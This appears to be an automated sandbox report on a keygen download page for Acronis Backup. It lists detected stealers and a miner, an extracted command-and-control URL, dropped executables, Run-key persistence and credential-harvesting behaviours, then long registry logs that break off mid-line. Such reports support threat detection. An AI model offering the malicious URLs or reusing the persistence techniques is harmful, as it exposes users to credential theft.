Resubmissions
25-06-2021 20:11
210625-gfywseazf2 1012-06-2021 10:48
210612-exwrsrnpvn 1008-06-2021 06:49
210608-4y4dr7djr6 10Analysis
-
max time kernel
1798s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-06-2021 10:48
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Behavioral task
behavioral1
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
win7v20210410
Behavioral task
behavioral2
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
win10v20210408
Behavioral task
behavioral3
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
macos
Behavioral task
behavioral4
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
debian9-mipsel
General
Malware Config
Extracted
raccoon
e0aa5b6d2491c503baf06d4cfeb218de1cd41474
-
url4cnc
https://tttttt.me/hbackwoods1
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/364-282-0x0000000140000000-0x000000014070D000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid process 263 364 msiexec.exe 263 364 msiexec.exe -
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
Processes:
software_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exekeygen-pr.exekeygen-step-1.exekeygen-step-5.exekeygen-step-6.exekeygen-step-3.exekeygen-step-4.exeCrack.exekey.exeDuAHpZZ.eXekey.exeSetup.exe24C.tmp.exeix78ESOrnjfX.exeBrowzar.exe1A1B.tmp.exe1AA9.tmp.exeix78ESOrnjfX.exeGloryWSetp.exe5801742.exe2625955.exe5191048.exeWinHoster.exe2600165.exe1597176.exenote8876.exehbggg.exejfiag3g_gg.exejfiag3g_gg.exe2600165.exe5191048.exepid process 5964 software_reporter_tool.exe 6012 software_reporter_tool.exe 6076 software_reporter_tool.exe 6096 software_reporter_tool.exe 1840 keygen-pr.exe 2320 keygen-step-1.exe 1772 keygen-step-5.exe 4260 keygen-step-6.exe 1720 keygen-step-3.exe 1452 keygen-step-4.exe 3320 Crack.exe 3256 key.exe 5080 DuAHpZZ.eXe 6104 key.exe 4548 Setup.exe 60 24C.tmp.exe 1640 ix78ESOrnjfX.exe 4708 Browzar.exe 904 1A1B.tmp.exe 5368 1AA9.tmp.exe 5560 ix78ESOrnjfX.exe 3320 GloryWSetp.exe 4688 5801742.exe 5080 2625955.exe 4512 5191048.exe 1252 WinHoster.exe 3520 2600165.exe 3696 1597176.exe 5764 note8876.exe 4320 hbggg.exe 2608 jfiag3g_gg.exe 5316 jfiag3g_gg.exe 1708 2600165.exe 1772 5191048.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Crack.exekeygen-step-4.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Crack.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation keygen-step-4.exe -
Drops startup file 2 IoCs
Processes:
1AA9.tmp.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NwuxwtYlIYE.exe 1AA9.tmp.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NwuxwtYlIYE.exe 1AA9.tmp.exe -
Loads dropped DLL 15 IoCs
Processes:
software_reporter_tool.exerUNdlL32.eXeregsvr32.exe24C.tmp.exepid process 6076 software_reporter_tool.exe 6076 software_reporter_tool.exe 6076 software_reporter_tool.exe 6076 software_reporter_tool.exe 6076 software_reporter_tool.exe 6076 software_reporter_tool.exe 6076 software_reporter_tool.exe 188 rUNdlL32.eXe 1044 regsvr32.exe 1044 regsvr32.exe 60 24C.tmp.exe 60 24C.tmp.exe 60 24C.tmp.exe 60 24C.tmp.exe 60 24C.tmp.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
2625955.exehbggg.exe1A1B.tmp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2625955.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hbggg.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1A1B.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe" 1A1B.tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Browzar.exenote8876.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Browzar.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note8876.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 268 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
regsvr32.exepid process 1044 regsvr32.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
key.exesvchost.exe1A1B.tmp.exeix78ESOrnjfX.exe1597176.exe2600165.exe5191048.exedescription pid process target process PID 3256 set thread context of 6104 3256 key.exe key.exe PID 4264 set thread context of 2060 4264 svchost.exe svchost.exe PID 4264 set thread context of 4232 4264 svchost.exe svchost.exe PID 904 set thread context of 4996 904 1A1B.tmp.exe msiexec.exe PID 904 set thread context of 364 904 1A1B.tmp.exe msiexec.exe PID 1640 set thread context of 5560 1640 ix78ESOrnjfX.exe ix78ESOrnjfX.exe PID 3696 set thread context of 5644 3696 1597176.exe AddInProcess32.exe PID 3520 set thread context of 1708 3520 2600165.exe 2600165.exe PID 4512 set thread context of 1772 4512 5191048.exe 5191048.exe -
Drops file in Program Files directory 4 IoCs
Processes:
Setup.exedescription ioc process File opened for modification C:\Program Files (x86)\Browzar\Browzar.exe Setup.exe File opened for modification C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe Setup.exe File opened for modification C:\Program Files (x86)\Browzar\Uninstall.exe Setup.exe File created C:\Program Files (x86)\Browzar\Uninstall.ini Setup.exe -
Drops file in Windows directory 1 IoCs
Processes:
MicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4516 4708 WerFault.exe Browzar.exe 5412 5560 WerFault.exe ix78ESOrnjfX.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5812 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4860 taskkill.exe -
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 13 IoCs
Processes:
svchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exechrome.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerUNdlL32.eXedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings chrome.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "1408" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "330322255" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{8BA130A1-B374-43E2-BA97-B3B3A47764F4} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 440214bb8d5fd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet 